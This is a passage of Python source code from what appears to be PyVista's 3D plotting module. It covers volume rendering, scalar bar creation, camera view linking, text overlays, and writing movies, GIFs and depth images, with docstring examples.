actor: vtk.vtkVolume
VTK volume of the input data.
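Examples
--------
A minimal sketch, assuming the built-in ``examples`` module and Matplotlib are available:
>>> import pyvista
>>> from pyvista import examples
>>> vol = examples.load_uniform()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_volume(vol, opacity='linear', cmap='viridis')
>>> plotter.show() # doctest:+SKIP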
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if culling is True:
culling = 'backface'
if mapper is None:
mapper = rcParams["volume_mapper"]
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError(f'Object type ({type(volume)}) not supported for plotting in PyVista.')
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = f'{type(volume).__name__}({volume.memory_address})'
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError(f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.')
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalars_info[1]
else:
raise ValueError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
# Resolve the scalars array and the scalar bar title
title = 'Data' if stitle is None else stitle
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
if stitle is None:
stitle = title
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float_)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': vtk.vtkGPUVolumeRayCastMapper,
'open_gl': vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise TypeError(f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}")
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
# Clip scalars to clim and rescale to 0-255 for the transfer functions
scalars = scalars.astype(np.float_)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
if cmap is not None:
if not has_matplotlib:
raise ImportError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError(f"Blending mode '{blending}' invalid. Please choose one of "
"'additive', 'average', 'composite', 'minimum' or 'maximum'.")
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
self.renderer.Modified()
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : 2 item list
The new range of the scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
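Examples
--------
A minimal sketch, assuming a mesh with point scalars was already added:
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(sphere, scalars=sphere.points[:, 2])
>>> plotter.update_scalar_bar_range([-1.0, 1.0])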
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise AttributeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError(f'Name ({name}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties."""
for renderer in self.renderers:
renderer.clear()
self._shadow_renderer.clear()
for renderer in self._background_renderers:
if renderer is not None:
renderer.clear()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
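Examples
--------
A minimal sketch linking both cameras of a 1x2 subplot layout:
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(1, 2), off_screen=True)
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pyvista.Cube())
>>> plotter.link_views()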
"""
if isinstance(views, (int, np.integer)):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
return
views = np.asarray(views)
if np.issubdtype(views.dtype, np.integer):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple: '
f'{type(views)} is given')
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.abc.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple: '
f'{type(views)} is given')
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=False, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=None, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None, fill=False):
"""Create scalar bar using the ranges as set by the last input mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the label font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the window's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the window's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalars range
above_label : str, optional
String annotation for values above the scalars range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of colors displayed in the scalar bar.
fill : bool
Draw a filled box behind the scalar bar with the ``background_color``
Notes
-----
Setting title_font_size or label_font_size disables automatic font
sizing for both the title and label.
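Examples
--------
A minimal sketch adding a custom vertical bar for elevation scalars:
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(sphere, scalars=sphere.points[:, 2], show_scalar_bar=False)
>>> _ = plotter.add_scalar_bar(title='Elevation', vertical=True, n_labels=3)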
"""
if interactive is None:
interactive = rcParams['interactive']
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if mapper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise AttributeError('Mapper does not exist. '
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
background_color = parse_color(background_color, opacity=1.0)
background_color = np.array(background_color) * 255
self.scalar_bar.GetBackgroundProperty().SetColor(background_color[0:3])
if fill:
self.scalar_bar.DrawBackgroundOn()
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.DrawTickLabelsOn()
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is not None or title_font_size is not None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
raise ValueError('Interactive scalar bars disabled for multi-renderer plots')
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
return self.scalar_bar # return the actor
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
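Examples
--------
A minimal sketch, assuming the sphere was added with active point scalars:
>>> import numpy as np
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(sphere, scalars=np.zeros(sphere.n_points))
>>> plotter.update_scalars(np.arange(sphere.n_points), render=False)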
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise ValueError('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
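Examples
--------
A small sketch shifting the last added mesh along z:
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(sphere)
>>> plotter.update_coordinates(sphere.points + [0.0, 0.0, 1.0], render=False)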
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self):
"""Close the render window."""
# must close out widgets first
super().close()
# Renderer has an axes widget, so close it
for renderer in self.renderers:
renderer.close()
self._shadow_renderer.close()
# Grab screenshots of last render
if self._store_image:
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
self._clear_ren_win()
self._style_class = None
if hasattr(self, 'iren'):
# self.iren.RemoveAllObservers()
for obs in self._observers.values():
self.iren.RemoveObservers(obs)
del self._observers
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
for renderer in self.renderers:
renderer.deep_clean()
self._shadow_renderer.deep_clean()
for renderer in self._background_renderers:
if renderer is not None:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
self.volume = None
self.textactor = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering
position : str, tuple(float)
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport: bool
If True and position is a tuple of float, uses
the normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Return
------
textActor : vtk.vtkTextActor
Text actor added to plot
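Examples
--------
Illustrative sketch showing corner-anchored and pixel-positioned text:
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_text('Corner title', position='upper_edge', font_size=14)
>>> _ = plotter.add_text('Free text', position=(20.0, 20.0))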
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': vtk.vtkCornerAnnotation.LowerRight,
'upper_left': vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imagio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
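Examples
--------
A minimal sketch of the GIF workflow (``orbit.gif`` is a hypothetical filename):
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.open_gif('orbit.gif') # doctest:+SKIP
>>> plotter.write_frame() # doctest:+SKIP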
"""
if filename[-3:] != 'gif':
raise ValueError('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file."""
if not hasattr(self, 'mwriter'):
raise RuntimeError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float
Fill value for points in image that don't include objects in scene.
To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool
Reset the camera clipping range to include data in view?
Return
------
image_depth : numpy.ndarray
Image of depth values from camera orthogonal to image plane
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
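Examples
--------
A minimal sketch, assuming the scene has already been rendered:
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.show() # doctest:+SKIP
>>> zval = plotter.get_image_depth() # doctest:+SKIP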
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image_depth'):
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.GetClippingRange()
if self.camera.GetParallelProjection():
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
args = np.logical_or(zval < -far, np.isclose(zval, -far))
self._image_depth_null = args
if fill_value is not None:
zval[args] = fill_value
return zval
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
actor : vtk.vtkActor
Lines actor.
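Examples
--------
A minimal sketch drawing a single line segment between two points:
>>> import numpy as np
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> points = np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]])
>>> actor = plotter.add_lines(points, color='y', width=3)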
"""
if not isinstance(lines, np.ndarray):
raise TypeError('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
